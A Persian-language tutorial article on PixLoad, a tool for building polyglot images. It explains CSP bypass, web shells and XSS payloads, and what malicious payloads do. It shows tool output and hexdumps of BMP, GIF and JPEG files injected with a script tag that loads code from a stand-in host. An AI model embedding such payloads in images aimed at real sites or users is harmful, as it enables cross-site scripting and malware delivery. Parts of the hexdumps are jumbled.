PixLoad چیست و چه کاربردی دارد؟

یکی از ابزار های فوق پیشرفته در زمینه ی پایش نفوذ، Pixload است که با استفاده از آن می توان اقدام به ساخت Payload نمود. همچنین با استفاده از این ابزار می توان Payload های مخرب را به تصاویر با هر نوع فرمتی تزریق کرد. با استفاده از Pixload می توان فایل های Polyglot را ساخت، که با استفاده از آن می توان به سادگی مکانیزم های CSP را دور زد. برای درک بهتر این که PixLoad چیست، باید بگوییم که با استفاده از این ابزار می توان فایل های مورد نظر را بر روی سرور سایت هدف، برای به دست آوردن داده های مورد نیاز بارگذاری نمود.

از این رو این ابزار می تواند در عملیات هایی چون تست نفوذ بسیار کارآمد باشد. از مهمترین مزیت PixLoad می توان به سازگاری بسیار بالای آن با انواع مرورگر هایی چون Edge، Safari، Chrome، Firefox و… اشاره کرد.

Polyglot چیست؟

فایل هایی که با فرمت های مختلف و با استفاده از زبان های برنامه نویسی گوناگون ساخته شده باشند و در کنار یکدیگر قرار گیرند با نام Polyglot شناخته می شوند.

ویژگی های PixLoad چیست؟

• قابلیت دور زدن و گذشتن از مکانیزم امنیتی CSP با استفاده از فایل JPEG Polyglot
• امکان رمزنگاری Web Shell و قرار دادن XSS Payload در فایل های PNG و IDAT
• امکان ساخت فایل های تصویری مخرب در فرمت های مختلف
• توانایی ایجاد فایل های Polyglot

یکی از ابزار های فوق پیشرفته در زمینه ی پایش نفوذ، Pixload است.

کاربرد Payload در PixLoad چیست؟

برای این که بدانیم PixLoad چیست باید با فایل های Payload و کاربرد آنها بیشتر آشنا شویم. همان طور که پیشتر گفته شد یکی از کاربرد های PixLoad ساخت فایل های Payload می باشد. در حقیقت از Payload به عنوان یک مولفه برای حمله سایبری استفاده می شود. به زبان ساده تر تمامی ویروس ها و بد افزار ها حاوی مقادیر زیادی Payload می باشند. حتی از Payload در پیوست ایمیل های مخرب نیز استفاده می شود. در ادامه به چند مورد از نحوه ی آسیب رسانی فایل های Payload اشاره شده است.

• یکی از شایع ترین اهداف Payload سرقت داده های حساس مانند اطلاعات مالی می باشد.
• در برخی مواقع از Payload برای جاسوسی و زیر نظر داشتن فعالیت های کاربر استفاده می شود. به طور معمول این گونه اطلاعات به شرکت های تبلیغاتی فروخته می شوند.
• در برخی مواقع از Payload برای نمایش مداوم محتواهای تبلیغاتی به طور ناخواسته استفاده می شود.
• یکی از موارد استفاده از Payload به شکل مخرب و بسیار خطرناک پاک کردن داده های کامپیوتر و مدارک است. Payload های مخرب ممکن است برای پاک کردن داده های سیستمی سیستم عامل برای از کار انداختن کامپیوتر استفاده شوند. حتی در برخی مواقع موجب خاموش شدن گوشی های هوشمند می شوند.
• از دیگر کاربرد های Payload می توان به اجرای برنامه های پس زمینه اشاره کرد. این گونه فعالیت ها می تواند استخراج رمز ارز و یا سرقت اطلاعات موجود در سیستم به صورت کاملا مخفی باشد.

یکی از شایع ترین اهداف Payload سرقت داده های حساس مانند اطلاعات مالی می باشد.

نحوه ی اجرای Payload ها

حال که دریافتیم PixLoad چیست و چه کاربردی دارد باید برای بارگذاری Payload دریابیم که قرار است چگونه اجرا گردد. این که یک فایل Payload چگونه اجرا شود کاملا بستگی به نحوه ی برنامه ریزی آن دارد. برای ساخت Payload مهاجمان به دنبال راهکاری برای نفوذ Payload به رایانه قربانی می گردند. به طور معمول پس از وارد شدن Payload به سیستم قربانی تا زمان اجرا به طور خاموش باقی می ماند. مهاجمان از روش های مختلفی برای اجرای Payload استفاده می کنند.

• یکی از شایع ترین روش ها تحریک قربانی برای باز کردن فایل Payload می باشد. Payload می تواند با استفاده از ابزار PixLoad در یک فایل تصویری جایگذاری شده باشد.
• یکی دیگر از روش ها بمب منطقی نام دارد. در این روش Payload به صورت یک جاسوس تمامی فعالیت های کاربر را زیر نظر می گیرد. در این حالت با توجه به شواهد و برنامه ریزی که بر روی Payload صورت گرفته است اجرا می شود.

نحوه بکارگیری PixLoad در ساخت تصاویر مخرب

PixLoad شامل مقادیری Payload به صورت پیش فرض می باشد. از این رو در ادامه می توانید با نحوه ی وارد کردن Payload مخرب به فایل تصاویر آشنا شوید. برای انجام این کار فقط کافی است که به دایرکتوری PixLoad وارد شده و مطابق با نیاز خود اقدام به ساخت تصاویر مخرب کنید.

1. ……… BMP Payload Creator/Injector ……..
2. ………………………………………..
3. … https://github.com/chinarulezzz/pixload …
4. ………………………………………..

5. [>] Generating output file
6. [✔] File saved to: payload.bmp

7. [>] Injecting payload into payload.bmp
8. [✔] Payload was injected successfully

9. payload.bmp: PC bitmap, OS/2 1.x format, 1 x 1 x 24, cbSize 10799, bits offset 26

• 42 4d 2f 2a 00 00 00 00 00 00 1a 00 00 00 0c 00  |BM/*…………|

10. 00000010 00 00 01 00 01 00 01 00  18 00 00 00 ff 00 2a 2f  |…………..*/|
11. 00000020 3d 31 3b 3c 73 63 72 69  70 74 20 73 72 63 3d 2f  |=1;<script src=/|
12. 00000030 2f 65 78 61 6d 70 6c 65  2e 63 6f 6d 3e 3c 2f 73  |/example.com></s|
13. 00000040 63 72 69 70 74 3e 3b                              |cript>;|
14. 00000047

یکی از شایع ترین روش ها تحریک قربانی برای باز کردن فایل Payload می باشد.

تزریق Payload به فایل تصویر با پسوند GIF در PixLoad چیست؟

1.      …….. GIF Payload Creator/Injector ………2.      ………………………………………..3.      … https://github.com/chinarulezzz/pixload …4.      ……………………………………….. 5.      [>] Generating output file6.      [✔] File saved to: payload.gif 7.      [>] Injecting payload into payload.gif8.      [✔] Payload was injected successfully 9.      payload.gif: GIF image data, version 87a, 10799 x 32 10.  47 49 46 38 37 61 2f 2a  20 00 80 00 00 04 02 04  |GIF87a/* …….|11.  00 00 00 2c 00 00 00 00  20 00 20 00 00 02 1e 84  |…,…. . …..|12.  00000020  8f a9 cb ed 0f a3 9c b4  da 8b b3 de bc fb 0f 86  |…………….|13.  00000030  e2 48 96 e6 89 a6 ea ca  b6 ee 0b 9b 05 00 3b 2a  |.H…………;*|14.  00000040  2f 3d 31 3b 3c 73 63 72  69 70 74 20 73 72 63 3d  |/=1;<script src=|15.  00000050  2f 2f 65 78 61 6d 70 6c  65 2e 63 6f 6d 3e 3c 2f  |//example.com></|16.  00000060  73 63 72 69 70 74 3e 3b                           |script>;|17.  00000068

با استفاده از PixLoad می توان Payload های مخرب را به تصاویر با هر نوع فرمتی تزریق کرد.

تزریق Payload به فایل تصویر با پسوند JPEG

1.      …….. JPEG Payload Creator/Injector ……..2.      ………………………………………..3.      … https://github.com/chinarulezzz/pixload …4.      ……………………………………….. 5.      [>] Generating output file6.      [✔] File saved to: payload.jpg 7.      [>] Injecting payload into COMMENT8.      [✔] Payload was injected successfully 9.      payload.jpg: JPEG image data, progressive, precision 8, 1×1, components 1 00           ff d8 ff fe 00 25 3c 73  63 72 69 70 74 20 73 72  |…..%<script sr|10.  00000010  63 3d 2f 2f 65 78 61 6d  70 6c 65 2e 63 6f 6d 3e  |c=//example.com>|11.  00000020  3c 2f 73 63 72 69 70 74  3e ff db 00 43 00 01 01  |</script>…C…|12.  00000030  01 01 01 01 01 01 01 01  01 01 01 01 01 01 01 01  |…………….|13.  *14.  00000060  01 01 01 01 01 01 01 01  01 01 01 01 01 01 ff c2  |…………….|15.  00000070  00 0b 08 00 01 00 01 01  01 11 00 ff c4 00 14 00  |…………….|16.  00000080  01 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |…………….|17.  00000090  03 ff da 00 08 01 01 00  00 00 01 3f ff d9        |………..?..|18.  0000009e

جمع بندی PixLoad چیست؟

PixLoad چیست و چه کاربردی دارد؟ این سوالی است که در این مقاله سعی بر پاسخ به آن نمودیم. به طور خلاصه باید بگوییم که PixLoad ابزاری برای ساخت و تزریق فایل های مخرب مانند Payload در فایل های مختلف تصویری می باشد. از این رو می توان از این ابزار برای نفوذ به سیستم های مختلف استفاده نمود. Payload ها می توانند در فایل تصاویر مخفی شوند و پس از باز شدن توسط کاربر شروع به فعالیت نمایند.